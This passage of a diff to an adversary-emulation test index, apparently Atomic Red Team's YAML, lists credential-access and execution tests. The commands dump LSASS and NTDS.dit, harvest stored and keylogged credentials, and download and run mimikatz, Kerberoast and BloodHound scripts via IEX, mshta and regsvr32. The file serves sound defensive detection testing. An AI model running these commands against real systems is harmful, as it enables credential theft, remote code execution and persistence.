|
|
|
|
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
|
|
|
|
|
executor:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: "#{dumpert_exe}\n"
|
|
|
|
|
cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using Windows Task Manager
|
|
|
|
|
description: |
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
|
|
|
|
@@ -20134,7 +20191,7 @@ credential-access:
|
|
|
|
|
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
|
|
|
|
|
full" exit
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Dump Active Directory Database with NTDSUtil
|
|
|
|
|
description: |
|
|
|
|
|
This test is intended to be run on a domain Controller.
|
|
|
|
@@ -20162,7 +20219,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Volume Shadow Copy with NTDS.dit
|
|
|
|
|
description: |
|
|
|
|
|
This test is intended to be run on a domain Controller.
|
|
|
|
@@ -20186,7 +20243,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe create shadow /for=#{drive_letter}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Copy NTDS.dit from Volume Shadow Copy
|
|
|
|
|
description: "This test is intended to be run on a domain Controller.\n\nThe
|
|
|
|
|
Active Directory database NTDS.dit may be dumped by copying it from a Volume
|
|
|
|
@@ -20234,7 +20291,7 @@ credential-access:
|
|
|
|
|
files on the Domain Controller. This value can be decrypted with gpp-decrypt
|
|
|
|
|
on Kali Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -20249,7 +20306,7 @@ credential-access:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: GPP Passwords (Get-GPPPassword)
|
|
|
|
|
description: |
|
|
|
|
|
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
|
|
|
|
@@ -20310,11 +20367,11 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'pypykatz live lsa
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Registry parse with pypykatz
|
|
|
|
|
description: 'Parses registry hives to obtain stored credentials
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -20333,7 +20390,7 @@ credential-access:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'pypykatz live registry
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1081:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -20409,11 +20466,11 @@ credential-access:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'python2 laZagne.py all
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Extract passwords with grep
|
|
|
|
|
description: 'Extracting credentials from files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_path:
|
|
|
|
|
description: Path to search
|
|
|
|
@@ -20426,11 +20483,11 @@ credential-access:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'grep -ri password #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Extracting passwords with findstr
|
|
|
|
|
description: 'Extracting Credentials from Files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20443,7 +20500,7 @@ credential-access:
|
|
|
|
|
description: 'Attempts to access unattend.xml, where credentials are commonly
|
|
|
|
|
stored, within the Panther directory where installation logs are stored.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20506,7 +20563,7 @@ credential-access:
|
|
|
|
|
- name: Enumeration for Credentials in Registry
|
|
|
|
|
description: 'Queries to enumerate for credentials in the Registry.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20518,7 +20575,7 @@ credential-access:
|
|
|
|
|
- name: Enumeration for PuTTY Credentials in Registry
|
|
|
|
|
description: 'Queries to enumerate for PuTTY credentials in the Registry.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -20526,7 +20583,7 @@ credential-access:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1179:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -20656,7 +20713,7 @@ credential-access:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -20764,7 +20821,7 @@ credential-access:
|
|
|
|
|
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1141:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -20838,7 +20895,7 @@ credential-access:
|
|
|
|
|
to apply changes." & return & return default answer "" with icon 1 with
|
|
|
|
|
hidden answer with title "Software Update"''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell - Prompt User for Password
|
|
|
|
|
description: |
|
|
|
|
|
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
|
|
|
|
@@ -20928,19 +20985,20 @@ credential-access:
|
|
|
|
|
identifier: T1208
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Request for service tickets
|
|
|
|
|
description: |
|
|
|
|
|
This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
|
|
|
|
|
|
|
|
|
|
The following are further sources and credits for this attack:
|
|
|
|
|
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
|
|
|
|
|
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
|
|
|
|
|
description: "This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1\n\nThe
|
|
|
|
|
following are further sources and credits for this attack:\n[Kerberoasting
|
|
|
|
|
Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)\n[Invoke-Kerberoast
|
|
|
|
|
source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)\nwhen
|
|
|
|
|
executed successfully , the test displays available services with their hashes.
|
|
|
|
|
\nIf the testing domain doesn't have any service principal name configured,
|
|
|
|
|
there is no output \n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
Import-Module .\Invoke-Kerberoast.ps1
|
|
|
|
|
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
|
|
|
|
|
Invoke-Kerberoast | fl
|
|
|
|
|
T1142:
|
|
|
|
|
technique:
|
|
|
|
@@ -21187,7 +21245,7 @@ credential-access:
|
|
|
|
|
description: 'Uses PowerShell to install and register a password filter DLL.
|
|
|
|
|
Requires a reboot and administrative privileges.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21281,11 +21339,11 @@ credential-access:
|
|
|
|
|
dir c:\ /b /s .key | findstr /e .key
|
|
|
|
|
cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Discover Private SSH Keys
|
|
|
|
|
description: 'Discover private SSH keys on a macOS or Linux system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -21303,7 +21361,7 @@ credential-access:
|
|
|
|
|
description: 'Copy private SSH keys on a Linux system to a staging folder using
|
|
|
|
|
the `cp` command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21321,7 +21379,7 @@ credential-access:
|
|
|
|
|
description: 'Copy private SSH keys on a Linux or macOS system to a staging
|
|
|
|
|
folder using the `rsync` command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -21405,7 +21463,7 @@ execution:
|
|
|
|
|
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\"
|
|
|
|
|
| python &""
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1191:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21485,7 +21543,7 @@ execution:
|
|
|
|
|
description: 'Adversaries may supply CMSTP.exe with INF files infected with
|
|
|
|
|
malicious commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21505,12 +21563,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: CMSTP Executing UAC Bypass
|
|
|
|
|
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
|
|
|
|
|
embedding them in the RunPreSetupCommandsSection of an INF file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -21530,7 +21588,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmstp.exe /s #{inf_file_uac} /au
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1059:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21675,7 +21733,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{local_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compiled HTML Help Remote Payload
|
|
|
|
|
description: |
|
|
|
|
|
Uses hh.exe to execute a remote compiled HTML Help payload.
|
|
|
|
@@ -21692,7 +21750,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hh.exe #{remote_chm_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -21850,7 +21908,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'control.exe #{cpl_file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1173:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -21930,7 +21988,7 @@ execution:
|
|
|
|
|
- name: Execute Commands
|
|
|
|
|
description: 'Executes commands via DDE using Microsfot Word
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -21952,7 +22010,7 @@ execution:
|
|
|
|
|
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
|
|
|
|
|
and execute a powershell script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -21960,7 +22018,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1118:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -22018,7 +22076,7 @@ execution:
|
|
|
|
|
description: 'Executes the CheckIfInstallable class constructor runner instead
|
|
|
|
|
of executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22084,7 +22142,7 @@ execution:
|
|
|
|
|
description: 'Executes the InstallHelper class constructor runner instead of
|
|
|
|
|
executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22151,7 +22209,7 @@ execution:
|
|
|
|
|
- name: InstallUtil class constructor method call
|
|
|
|
|
description: 'Executes the installer assembly class constructor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22218,7 +22276,7 @@ execution:
|
|
|
|
|
- name: InstallUtil Install method call
|
|
|
|
|
description: 'Executes the Install Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22285,7 +22343,7 @@ execution:
|
|
|
|
|
- name: InstallUtil Uninstall method call - /U variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22353,7 +22411,7 @@ execution:
|
|
|
|
|
variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22420,7 +22478,7 @@ execution:
|
|
|
|
|
- name: InstallUtil HelpText method call
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22488,7 +22546,7 @@ execution:
|
|
|
|
|
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
|
|
|
|
|
using a nonstandard extension for the assembly.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -22605,14 +22663,14 @@ execution:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1168:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -22700,7 +22758,7 @@ execution:
|
|
|
|
|
of the referenced file. This technique was used by numerous IoT automated
|
|
|
|
|
exploitation attacks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -22717,13 +22775,13 @@ execution:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Cron - Add script to cron folder
|
|
|
|
|
description: 'This test adds a script to a cron folder configured to execute
|
|
|
|
|
on a schedule. This technique was used by the threat actor Rocke during the
|
|
|
|
|
exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -22740,7 +22798,7 @@ execution:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Event Monitor Daemon Persistence
|
|
|
|
|
description: "This test adds persistence via a plist to execute via the macOS
|
|
|
|
|
Event Monitor Daemon. \n"
|
|
|
|
@@ -22891,7 +22949,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta calls a local VBScript file to launch notepad.exe
|
|
|
|
|
description: Tests execution of a local program by a VBScript file called by
|
|
|
|
|
Mshta
|
|
|
|
@@ -22906,7 +22964,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta executes VBScript to execute malicious command
|
|
|
|
|
description: |
|
|
|
|
|
Run a local VB script to run local user enumeration powershell command
|
|
|
|
@@ -22919,7 +22977,7 @@ execution:
|
|
|
|
|
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
|
|
|
|
|
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mshta Executes Remote HTML Application (HTA)
|
|
|
|
|
description: |
|
|
|
|
|
Execute an arbitrary remote HTA.
|
|
|
|
@@ -22943,7 +23001,7 @@ execution:
|
|
|
|
|
mshta "#{temp_file}"
|
|
|
|
|
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1086:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -23037,7 +23095,7 @@ execution:
|
|
|
|
|
- name: Mimikatz
|
|
|
|
|
description: 'Download Mimikatz and dump credentials
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23051,7 +23109,7 @@ execution:
|
|
|
|
|
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
|
|
|
|
|
Invoke-Mimikatz -DumpCreds"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: BloodHound
|
|
|
|
|
description: "Upon execution BloodHound will be downloaded and executed. It
|
|
|
|
|
will set up collection methods, run,\n\nand then compress and store the data
|
|
|
|
@@ -23064,12 +23122,15 @@ execution:
|
|
|
|
|
type: url
|
|
|
|
|
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
|
|
|
|
Invoke-BloodHound"
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
|
|
|
|
|
Invoke-BloodHound
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Obfuscation Tests
|
|
|
|
|
description: |
|
|
|
|
|
Different obfuscated methods to test
|
|
|
|
@@ -23086,7 +23147,7 @@ execution:
|
|
|
|
|
- name: Mimikatz - Cradlecraft PsSendKeys
|
|
|
|
|
description: 'Run mimikatz via PsSendKeys
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -23118,11 +23179,11 @@ execution:
|
|
|
|
|
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
|
|
|
|
|
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Add User
|
|
|
|
|
description: 'Using PS 5.1, add a user via CLI
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23148,7 +23209,7 @@ execution:
|
|
|
|
|
command: 'New-LocalUser -FullName ''#{full_name}'' -Name ''#{user_name}''
|
|
|
|
|
-Password #{password} -Description ''#{description}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell MsXml COM object - no prompt
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23168,7 +23229,7 @@ execution:
|
|
|
|
|
-ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
|
|
|
|
|
$comMsXml.ResponseText"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell MsXml COM object - with prompt
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23188,7 +23249,7 @@ execution:
|
|
|
|
|
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
|
|
|
|
|
$comMsXml.ResponseText"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell XML requests
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23207,7 +23268,7 @@ execution:
|
|
|
|
|
bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
|
|
|
|
|
| IEX"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell invoke mshta.exe download
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23224,7 +23285,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Invoke-DownloadCradle
|
|
|
|
|
description: |
|
|
|
|
|
Provided by https://github.com/mgreen27/mgreen27.github.io
|
|
|
|
@@ -23240,7 +23301,7 @@ execution:
|
|
|
|
|
description: 'Execution of a PowerShell payload from the Windows Registry similar
|
|
|
|
|
to that seen in fileless malware infections.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -23256,7 +23317,7 @@ execution:
|
|
|
|
|
- name: PowerShell Downgrade Attack
|
|
|
|
|
description: 'Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependencies:
|
|
|
|
@@ -23270,12 +23331,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: NTFS Alternate Data Stream Access
|
|
|
|
|
description: 'Creates a file with an alternate data stream and simulates executing
|
|
|
|
|
that hidden code/file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23297,7 +23358,7 @@ execution:
|
|
|
|
|
Invoke-Expression $streamcommand
|
|
|
|
|
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1121:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -23359,9 +23420,10 @@ execution:
|
|
|
|
|
identifier: T1121
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regasm Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required. Upon
|
|
|
|
|
execution, "I shouldn''t really execute either." will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23389,12 +23451,11 @@ execution:
|
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvs Uninstall Method Call Test
|
|
|
|
|
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
|
|
|
|
|
SNK
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
|
|
|
|
|
along with other information about the assembly being installed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23500,9 +23561,9 @@ execution:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23522,12 +23583,11 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#(unknown) scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
|
|
|
|
|
'
|
